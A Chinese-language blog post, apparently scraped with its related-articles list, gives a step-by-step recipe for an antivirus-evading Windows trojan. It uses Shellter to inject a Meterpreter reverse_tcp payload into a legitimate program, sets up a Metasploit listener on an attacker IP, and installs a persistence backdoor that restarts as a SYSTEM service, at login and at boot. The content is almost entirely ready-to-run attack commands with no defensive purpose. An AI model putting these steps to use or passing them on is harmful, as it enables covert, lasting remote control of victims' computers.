Windows免杀木马+维持权限(shellter)

一.生成木马

工具:shellter

环境:windows xp,Windows 7

操作:

  • cmd 打开 shellter.exe

  • 选择a,y

  • 输入要注入木马的程序路径

  • 选择y,l,1

  • 输入返回的ip

  • 最后回车就好了

二.开始监听

环境:kali

命令:

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.1.112(返回ip)
set LPORT 1234(端口)
run

拿到shell

三.维持权限

在shell下

自动切换到稳定的进程:

run post/windows/manage/migrate

安装后门:

run persistence -S -U -X -i 10 -p 5555 -r 192.168.1.122

具体参数含义:

-A   自动启动一个匹配的exploit / multi / handler来连接到代理
-L   如果未使用%TEMP%,则在目标主机中写入有效负载的位置。
-P   有效负载使用,默认为windows / meterpreter / reverse_tcp。
-S   作为服务自动启动代理程序(具有SYSTEM权限)
-T   要使用的备用可执行模板
-U   用户登录时自动启动代理
-X   系统引导时自动启动代理程序
-h   帮助菜单
-i   每次连接尝试之间的时间间隔(秒)
-p   运行Metasploit的系统正在侦听的端口
-r   运行Metasploit监听连接的系统的IP

Windows免杀木马+维持权限(shellter)相关推荐

  1. 利用kali Linux使用meterpreter制作免杀木马测试入侵windows电脑

    前言:常规使用meterpreter制作木马时会被各大杀毒软件所拦截,固本文介绍一下利用meterpreter下的Venom制作免杀木马. 首先安装Venom Venon克隆地址:https://gi ...

  2. 实战: unicorn生成免杀木马,绕过win10防火墙和windows defender

    实战: unicorn生成免杀木马,绕过win10防火墙和windows defender 简介 原理 步骤 攻击 总结 简介 随着操作系统的安全等级越来越高,对能免杀,无视防火墙的木马需求也越来越高 ...

  3. Web渗透之MSF框架——msfvenom与免杀木马制作

    文章目录 生成常见的反向连接木马 反向连接的优势: Windows: Linux: MAC: PHP: Asp: Aspx: msfvenom参数介绍 生成免杀木马 360免杀木马 腾讯管家免杀木马 ...

  4. 偷工减料制作自己的免杀木马 6月11日更新(秒杀主流11款杀软)

    很多新手在为能有一个免杀木马头疼,也相信很多人在饭客论坛上等待别人更新免杀,可是刚拿到手不久就又被杀了,呵呵,这里告诉大家一个小秘密,偷工减料得到免杀木马噢,而且不会被杀... 饭客论坛经常更新免杀, ...

  5. 绕过杀毒软件,免杀木马制作

    绕过杀毒软件,免杀木马制作(以AVG Anti Spyware杀毒软件为例) 一.将Sever.exe打开,分块生成100个文件 二.使用AVG Anti Spyware查杀生成的文件,再二次处理,重 ...

  6. Metasploit——msfvenom免杀木马

    msfvenom命令的参数 Options:-l, --list <type> # 列出所有可用的项目,其中值可以被设置为 payloads, encoders, nops, platfo ...

  7. 利用Metasploit制作免杀木马

    请大家认真选择投票项,后续更新以此作为依据. 今日更新PPT内容11个,内容:数据安全, CASB保护零信任环境的数据安全实践: https://www.secshi.com/39625.html 以 ...

  8. 使用Bypass_AV-main进行免杀木马

    项目地址:https://github.com/Axx8/Bypass_AV 生成shellcode,ip与端口替换 将生成的shellcode复制下来放入项目中的py文件 将shellcode复制到 ...

  9. 【免杀】————2、php免杀木马的思路

    一般的,利用能够执行系统命令.加载代码的函数,或者组合一些普通函数,完成一些高级间谍功能的网站后门的脚本,叫做 Webshell. 本篇文章主要探讨关于 PHP 语言的 Webshell 检测工具和平 ...

  10. 使用Shecodject生成免杀木马

    文章目录 安装 使用 安装 git clone https://github.com/TaroballzChen/Shecodject.git cd Shecodject cd setup pytho ...

最新文章

  1. Docker实战9 之Dockerfile深入实践
  2. docker笔记-docker-container
  3. python汽车票票系统_长途客运售票系统
  4. PL/SQL轻量版(四)——存储函数/存储过程与触发器
  5. mysql审计权限_MySQL对普通用户(没有super)开启审计功能
  6. V7000存储运维使用手册
  7. 对计算机的理解大一1000,大一计算机实训报告总结范文-求计算机实习报告1000字左右,急急急?...
  8. oracle 设置输出显示中文乱码,修改oracle当前会话的语言环境,解决oracle显示中文乱码的问题 | 信春哥,系统稳,闭眼上线不回滚!...
  9. 插入网站连接_带你了解网站设计的五个基本步骤
  10. python中扑克牌类设计_python中的图像界面设计(二)
  11. 很多餐饮店都会倒闭,最主要的是有2大原因
  12. easyui 扩展验证
  13. etcdctl的使用
  14. 2020 金山云 面经
  15. hadoop学习一-hadoop简介
  16. android平台db4o使用示例
  17. 2021-CVPR-Inpainting论文导读
  18. Android 真实 简历
  19. 使用MediaRecorder录制音频和视频(Camera1)
  20. switch:欢迎进入迷你游戏平台,选择你喜爱的游戏

热门文章

  1. 阿里网盘挂载到本地(Webdav)
  2. Git 使用tag标签
  3. Unity 集成admob 出错AAPT: error :unexpected element <queries> found in <manifest>
  4. “QQ尾巴病毒”核心技术的实现(转)
  5. 【卫星轨道】初步学习,零散知识点
  6. 谷歌浏览器好用的复制粘贴插件_Chrome粘贴插件:将其粘贴
  7. Webpack的使用——进阶篇
  8. JavaScript hash 与 history 实现客户端路由的原理
  9. 微信小程序之“豆瓣电影”
  10. 刘欣《码农翻身》之动态代理读后感